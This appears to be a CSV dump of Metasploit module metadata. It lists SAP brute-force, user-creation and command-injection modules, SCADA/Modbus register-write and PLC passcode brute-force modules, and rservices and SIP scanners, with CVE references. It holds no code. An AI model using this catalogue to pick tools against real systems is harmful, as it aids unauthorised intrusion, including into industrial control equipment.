The RPORT, CPORT, and ECHOID values must match the rogue_send parameters used exactly.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.metasploit.com/research/projects/rogue_network/","hdm " 1640,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rogue/rogue_send.rb","auxiliary","scanner/rogue/rogue_send","auxiliary/scanner/rogue/rogue_send","Rogue Gateway Detection: Sender",300,"This module send a series of TCP SYN and ICMP ECHO requests to each internal target host, spoofing the source address of an external system running the rogue_recv module. This allows the system running the rogue_recv module to determine what external IP a given internal system is using as its default route.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.metasploit.com/research/projects/rogue_network/","hdm " 1641,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rservices/rexec_login.rb","auxiliary","scanner/rservices/rexec_login","auxiliary/scanner/rservices/rexec_login","rexec Authentication Scanner",300,"This module will test an rexec service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502, CVE-1999-0651","jduck " 1642,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rservices/rlogin_login.rb","auxiliary","scanner/rservices/rlogin_login","auxiliary/scanner/rservices/rlogin_login","rlogin Authentication Scanner",300,"This module will test an rlogin service on a range of machines and report successful logins. 
NOTE: This module requires access to bind to privileged ports (below 1024).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502, CVE-1999-0651","jduck " 1643,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/rservices/rsh_login.rb","auxiliary","scanner/rservices/rsh_login","auxiliary/scanner/rservices/rsh_login","rsh Authentication Scanner",300,"This module will test a shell (rsh) service on a range of machines and report successful logins. NOTE: This module requires access to bind to privileged ports (below 1024).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502, CVE-1999-0651","jduck " 1644,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb","auxiliary","scanner/sap/sap_ctc_verb_tampering_user_mgmt","auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt","SAP CTC Service Verb Tampering User Management",300,"This module exploits an authentication bypass vulnerability in SAP NetWeaver CTC service. The service is vulnerable to verb tampering allowing for unauthorised OS user management. 
Information about resolution should be available at SAP notes 1589525 and 1624450 (authentication required).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/, URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf","Alexandr Polyakov, nmonkee"
1645,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_icf_public_info.rb","auxiliary","scanner/sap/sap_icf_public_info","auxiliary/scanner/sap/sap_icf_public_info","SAP ICF /sap/public/info Service Sensitive Information Gathering",300,"This module uses the /sap/public/info service within SAP Internet Communication Framework (ICF) to obtain the operating system version, SAP version, IP address and other information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Agnivesh Sathasivam, ChrisJohnRiley, nmonkee"
1646,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb","auxiliary","scanner/sap/sap_icm_urlscan","auxiliary/scanner/sap/sap_icm_urlscan","SAP URL Scanner",300,"This module scans for commonly found SAP Internet Communication Manager URLs and outputs return codes for the user.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-0738","Chris John Riley"
1647,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb","auxiliary","scanner/sap/sap_mgmt_con_abaplog","auxiliary/scanner/sap/sap_mgmt_con_abaplog","SAP Management Console ABAP Syslog Disclosure",300,"This module simply attempts to extract the ABAP syslog through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley"
1648,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb","auxiliary","scanner/sap/sap_mgmt_con_brute_login","auxiliary/scanner/sap/sap_mgmt_con_brute_login","SAP Management Console Brute Force",300,"This module simply attempts to brute force the username | password for the SAP Management Console SOAP Interface. By setting the SAP SID value, a list of default SAP users can be tested without needing to set a USERNAME or USER_FILE value. The default usernames are stored in ./data/wordlists/sap_common.txt (the value of SAP SID is automatically inserted into the username to replace ).","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley"
1649,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb","auxiliary","scanner/sap/sap_mgmt_con_extractusers","auxiliary/scanner/sap/sap_mgmt_con_extractusers","SAP Management Console Extract Users",300,"This module simply attempts to extract SAP users from the ABAP Syslog through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley"
1650,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb","auxiliary","scanner/sap/sap_mgmt_con_getaccesspoints","auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints","SAP Management Console Get Access Points",300,"This module simply attempts to output a list of SAP access points through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley"
1651,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb","auxiliary","scanner/sap/sap_mgmt_con_getenv","auxiliary/scanner/sap/sap_mgmt_con_getenv","SAP Management Console getEnvironment",300,"This module simply attempts to identify SAP Environment settings through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley"
1652,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb","auxiliary","scanner/sap/sap_mgmt_con_getlogfiles","auxiliary/scanner/sap/sap_mgmt_con_getlogfiles","SAP Management Console Get Logfile",300,"This module simply attempts to download available logfiles and developer tracefiles through the SAP Management Console SOAP Interface. Please use the sap_mgmt_con_listlogfiles extension to view a list of available files.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Bruno Morisson , Chris John Riley"
1653,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb","auxiliary","scanner/sap/sap_mgmt_con_getprocesslist","auxiliary/scanner/sap/sap_mgmt_con_getprocesslist","SAP Management Console GetProcessList",300,"This module attempts to list SAP processes through the SAP Management Console SOAP Interface","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Bruno Morisson , Chris John Riley"
1654,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb","auxiliary","scanner/sap/sap_mgmt_con_getprocessparameter","auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter","SAP Management Console Get Process Parameters",300,"This module simply attempts to output SAP process parameters and configuration settings through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley"
1655,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb","auxiliary","scanner/sap/sap_mgmt_con_instanceproperties","auxiliary/scanner/sap/sap_mgmt_con_instanceproperties","SAP Management Console Instance Properties",300,"This module simply attempts to identify the instance properties through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley"
1656,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb","auxiliary","scanner/sap/sap_mgmt_con_listlogfiles","auxiliary/scanner/sap/sap_mgmt_con_listlogfiles","SAP Management Console List Logfiles",300,"This module simply attempts to output a list of available logfiles and developer tracefiles through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley"
1657,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb","auxiliary","scanner/sap/sap_mgmt_con_startprofile","auxiliary/scanner/sap/sap_mgmt_con_startprofile","SAP Management Console getStartProfile",300,"This module simply attempts to access the SAP startup profile through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley"
1658,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb","auxiliary","scanner/sap/sap_mgmt_con_version","auxiliary/scanner/sap/sap_mgmt_con_version","SAP Management Console Version Detection",300,"This module simply attempts to identify the version of SAP through the SAP Management Console SOAP Interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley"
1659,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_router_info_request.rb","auxiliary","scanner/sap/sap_router_info_request","auxiliary/scanner/sap/sap_router_info_request","SAPRouter Admin Request",300,"Display the remote connection table from a SAPRouter.","BSD License","f",,,,"aggressive","t","URL-http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2%20-%20Mariano%20Nunez%20Di%20Croce%20-%20SAProuter%20.pdf, URL-http://help.sap.com/saphelp_nw70ehp3/helpdata/en/48/6c68b01d5a350ce10000000a42189d/content.htm, URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/, URL-http://www.onapsis.com/research-free-solutions.php","Mariano Nunez, nmonkee"
1660,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_service_discovery.rb","auxiliary","scanner/sap/sap_service_discovery","auxiliary/scanner/sap/sap_service_discovery","SAP Service Discovery",300,"Scans for listening SAP services.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley"
1661,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_smb_relay.rb","auxiliary","scanner/sap/sap_smb_relay","auxiliary/scanner/sap/sap_smb_relay","SAP SMB Relay Abuse",300,"This module provides several SMB Relay abuses through different SAP services and functions. The attack is done through specially crafted requests including a UNC path which will be accessed by the SAP system while trying to process the request. In order to get the hashes the auxiliary/server/capture/smb module can be used.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://erpscan.com/advisories/dsecrg-12-033-sap-basis-6-407-02-xml-external-entity/, URL-https://service.sap.com/sap/support/notes/1597066","Alexey Tyurin, nmonkee"
1662,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb","auxiliary","scanner/sap/sap_soap_bapi_user_create1","auxiliary/scanner/sap/sap_soap_bapi_user_create1","SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation",300,"This module makes use of the BAPI_USER_CREATE1 function, through the SOAP /sap/bc/soap/rfc service, for creating/modifying users on a SAP system.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee"
1663,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb","auxiliary","scanner/sap/sap_soap_rfc_brute_login","auxiliary/scanner/sap/sap_soap_rfc_brute_login","SAP /sap/bc/soap/rfc SOAP Service RFC_PING Login Brute Forcer",300,"This module attempts to brute force SAP usernames and passwords through the /sap/bc/soap/rfc SOAP service, using the RFC_PING function. Default clients can be tested without needing to set a CLIENT. Common/default user and password combinations can be tested by just setting the DEFAULT_CRED variable to true. These default combinations are stored in MSF_DATA_DIRECTORY/wordlists/sap_default.txt.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee"
1664,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb","auxiliary","scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec","auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec","SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection",300,"This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection, URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","nmonkee"
1665,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb","auxiliary","scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec","auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec","SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection",300,"This module makes use of the SXPG_COMMAND_EXEC Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection, URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","nmonkee"
1666,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb","auxiliary","scanner/sap/sap_soap_rfc_eps_get_directory_listing","auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing","SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure",300,"This module abuses the SAP NetWeaver EPS_GET_DIRECTORY_LISTING function, on the SAP SOAP RFC Service, to check for remote directory existence and get the number of entries in it. The module can also be used to capture SMB hashes by using a fake SMB share as DIR.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com","nmonkee"
1667,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb","auxiliary","scanner/sap/sap_soap_rfc_pfl_check_os_file_existence","auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence","SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check",300,"This module abuses the SAP NetWeaver PFL_CHECK_OS_FILE_EXISTENCE function, on the SAP SOAP RFC Service, to check for file existence on the remote file system. The module can also be used to capture SMB hashes by using a fake SMB share as FILEPATH.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-51645, OSVDB-78537, URL-http://erpscan.com/advisories/dsecrg-12-009-sap-netweaver-pfl_check_os_file_existence-missing-authorisation-check-and-smb-relay-vulnerability/","Alexey Tyurin, nmonkee"
1668,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb","auxiliary","scanner/sap/sap_soap_rfc_ping","auxiliary/scanner/sap/sap_soap_rfc_ping","SAP /sap/bc/soap/rfc SOAP Service RFC_PING Function Service Discovery",300,"This module makes use of the RFC_PING function, through the /sap/bc/soap/rfc SOAP service, to test connectivity to remote RFC destinations.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee"
1669,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb","auxiliary","scanner/sap/sap_soap_rfc_read_table","auxiliary/scanner/sap/sap_soap_rfc_read_table","SAP /sap/bc/soap/rfc SOAP Service RFC_READ_TABLE Function Dump Data",300,"This module makes use of the RFC_READ_TABLE Function to read data from tables using the /sap/bc/soap/rfc SOAP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee"
1670,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb","auxiliary","scanner/sap/sap_soap_rfc_rzl_read_dir","auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir","SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing",300,"This module exploits the SAP NetWeaver RZL_READ_DIR_LOCAL function, on the SAP SOAP RFC Service, to enumerate directory contents. It returns only the first 32 characters of each filename, since they are truncated. The module can also be used to capture SMB hashes by using a fake SMB share as DIR.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-92732, URL-http://erpscan.com/advisories/dsecrg-12-026-sap-netweaver-rzl_read_dir_local-missing-authorization-check-and-smb-relay-vulnerability/","Alexey Tyurin, nmonkee"
1671,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb","auxiliary","scanner/sap/sap_soap_rfc_susr_rfc_user_interface","auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface","SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation",300,"This module makes use of the SUSR_RFC_USER_INTERFACE function, through the SOAP /sap/bc/soap/rfc service, for creating/modifying users on a SAP system.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee"
1672,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb","auxiliary","scanner/sap/sap_soap_rfc_sxpg_call_system_exec","auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec","SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution",300,"This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service, to execute OS commands as configured in the SM69 transaction.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee"
1673,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb","auxiliary","scanner/sap/sap_soap_rfc_sxpg_command_exec","auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec","SAP SOAP RFC SXPG_COMMAND_EXECUTE",300,"This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service, to execute OS commands as configured in the SM69 transaction.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee"
1674,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb","auxiliary","scanner/sap/sap_soap_rfc_system_info","auxiliary/scanner/sap/sap_soap_rfc_system_info","SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering",300,"This module makes use of the RFC_SYSTEM_INFO Function to obtain the operating system version, SAP version, IP address and other information through the use of the /sap/bc/soap/rfc SOAP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2006-6010, URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, ChrisJohnRiley, nmonkee"
1675,"2013-05-11 08:19:05","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb","auxiliary","scanner/sap/sap_soap_th_saprel_disclosure","auxiliary/scanner/sap/sap_soap_th_saprel_disclosure","SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure",300,"This module attempts to identify software, OS and DB versions through the SAP function TH_SAPREL using the /sap/bc/soap/rfc SOAP service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","Agnivesh Sathasivam, nmonkee"
1676,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb","auxiliary","scanner/sap/sap_web_gui_brute_login","auxiliary/scanner/sap/sap_web_gui_brute_login","SAP Web GUI Login Brute Forcer",300,"This module attempts to brute force SAP usernames and passwords through the SAP Web GUI service. Default clients can be tested without needing to set a CLIENT. Common and default user/password combinations can be tested by just setting the DEFAULT_CRED variable to true. These default combinations are stored in MSF_DATA_DIRECTORY/wordlists/sap_default.txt.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","nmonkee"
1677,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/digi_addp_reboot.rb","auxiliary","scanner/scada/digi_addp_reboot","auxiliary/scanner/scada/digi_addp_reboot","Digi ADDP Remote Reboot Initiator",300,"Reboot Digi International based equipment through the ADDP service","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://qbeukes.blogspot.com/2009/11/advanced-digi-discovery-protocol_21.html, URL-http://www.digi.com/wiki/developer/index.php/Advanced_Device_Discovery_Protocol_%28ADDP%29","hdm "
1678,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/digi_addp_version.rb","auxiliary","scanner/scada/digi_addp_version","auxiliary/scanner/scada/digi_addp_version","Digi ADDP Information Discovery",300,"Discover host information through the Digi International ADDP service","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://qbeukes.blogspot.com/2009/11/advanced-digi-discovery-protocol_21.html, URL-http://www.digi.com/wiki/developer/index.php/Advanced_Device_Discovery_Protocol_%28ADDP%29","hdm "
1679,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb","auxiliary","scanner/scada/digi_realport_serialport_scan","auxiliary/scanner/scada/digi_realport_serialport_scan","Digi RealPort Serial Server Port Scanner",300,"Identify active ports on RealPort-enabled serial servers.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.digi.com/pdf/fs_realport.pdf, URL-http://www.digi.com/support/productdetail?pid=2229&type=drivers","hdm "
1680,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/digi_realport_version.rb","auxiliary","scanner/scada/digi_realport_version","auxiliary/scanner/scada/digi_realport_version","Digi RealPort Serial Server Version",300,"Detect serial servers that speak the RealPort protocol.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.digi.com/pdf/fs_realport.pdf, URL-http://www.digi.com/support/productdetail?pid=2229&type=drivers","hdm "
1681,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb","auxiliary","scanner/scada/indusoft_ntwebserver_fileaccess","auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess","Indusoft WebStudio NTWebServer Remote File Access",300,"This module exploits a directory traversal vulnerability in Indusoft WebStudio. The vulnerability exists in the NTWebServer component and allows reading arbitrary remote files with the privileges of the NTWebServer process. The module has been tested successfully on Indusoft WebStudio 6.1 SP6.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-47842, CVE-2011-1900, OSVDB-73413, URL-http://www.indusoft.com/hotfixes/hotfixes.php","Unknown, juan vazquez "
1682,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/koyo_login.rb","auxiliary","scanner/scada/koyo_login","auxiliary/scanner/scada/koyo_login","Koyo DirectLogic PLC Password Brute Force Utility",300,"This module attempts to authenticate to a locked Koyo DirectLogic PLC. The PLC uses a restrictive passcode, which can be A0000000 through A9999999. The ""A"" prefix can also be changed by the administrator to any other character, which can be set through the PREFIX option of this module. This module is based on the original 'koyobrute.rb' Basecamp module from DigitalBond.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",,,"aggressive","t","URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/","K. Reid Wightman , todb "
1683,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/modbus_findunitid.rb","auxiliary","scanner/scada/modbus_findunitid","auxiliary/scanner/scada/modbus_findunitid","Modbus Unit ID and Station ID Enumerator",300,"Modbus is a cleartext protocol used in common SCADA systems, developed originally as a serial-line (RS232) async protocol and later transformed to IP, which is called ModbusTCP. The default TCP port is 502. This module sends a command (0x04, read input register) to the Modbus endpoint. If this command is sent to the correct unit-id, it returns with the same function-id; if not, 0x80 is added to it, so that it says 0x84, and an exception-code follows, which does not interest us. This does not always happen, but at least the first 4 bytes in the return packet should be exactly the same as what was sent. You can change port, IP and the scan range for unit-id. A BENICE value is also provided to make the scanner sleep a second or more between probes. We have seen installations where scanning too many too fast works like a DoS.","Metasploit Framework License (BSD)","f","2012-10-28 00:00:00",,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Modbus:TCP, URL-http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx","EsMnemon "
1684,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/modbusclient.rb","auxiliary","scanner/scada/modbusclient","auxiliary/scanner/scada/modbusclient","Modbus Client Utility",300,"This module sends a command (0x06, write to one register) to a Modbus endpoint. You can change port, IP, register to write and data to write, as well as unit-id. Modbus is a clear text protocol used in common SCADA systems, developed originally as a serial-line (RS232) async protocol. It was later transformed to IP, which is called ModbusTCP. There are a handful of possible functions, but this client has only implemented the function ""write value to register"" (\x48).","Metasploit Framework License (BSD)","f","2011-11-01 00:00:00",,,"aggressive","t","URL-http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx","EsMnemon "
1685,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/modbusdetect.rb","auxiliary","scanner/scada/modbusdetect","auxiliary/scanner/scada/modbusdetect","Modbus Version Scanner",300,"This module detects the Modbus service, tested on a SAIA PCD1.M2 system. Modbus is a clear text protocol used in common SCADA systems, developed originally as a serial-line (RS232) async protocol, and later transformed to IP, which is called ModbusTCP.","Metasploit Framework License (BSD)","f","2011-11-01 00:00:00",,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Modbus:TCP, URL-http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx","EsMnemon "
1686,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb","auxiliary","scanner/scada/sielco_winlog_fileaccess","auxiliary/scanner/scada/sielco_winlog_fileaccess","Sielco Sistemi Winlog Remote File Access",300,"This module exploits a directory traversal in Sielco Sistemi Winlog. The vulnerability exists in the Runtime.exe service and can be triggered by sending a specially crafted packet to the 46824/TCP port. This module has been successfully tested on Sielco Sistemi Winlog Lite 2.07.14.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-54212, EDB-19409, OSVDB-83275, URL-http://aluigi.altervista.org/adv/winlog_2-adv.txt","Luigi Auriemma, juan vazquez "
1687,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sip/enumerator.rb","auxiliary","scanner/sip/enumerator","auxiliary/scanner/sip/enumerator","SIP Username Enumerator (UDP)",300,"Scan for numeric usernames/extensions using OPTIONS/REGISTER requests","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et "
1688,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sip/enumerator_tcp.rb","auxiliary","scanner/sip/enumerator_tcp","auxiliary/scanner/sip/enumerator_tcp","SIP Username Enumerator (TCP)",300,"Scan for numeric usernames/extensions using OPTIONS/REGISTER requests","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"et "
1689,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/sip/options.rb","auxiliary","scanner/sip/options","auxiliary/scanner/sip/options","SIP Endpoint Scanner (UDP)",300,"Scan for SIP devices using OPTIONS requests","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm "
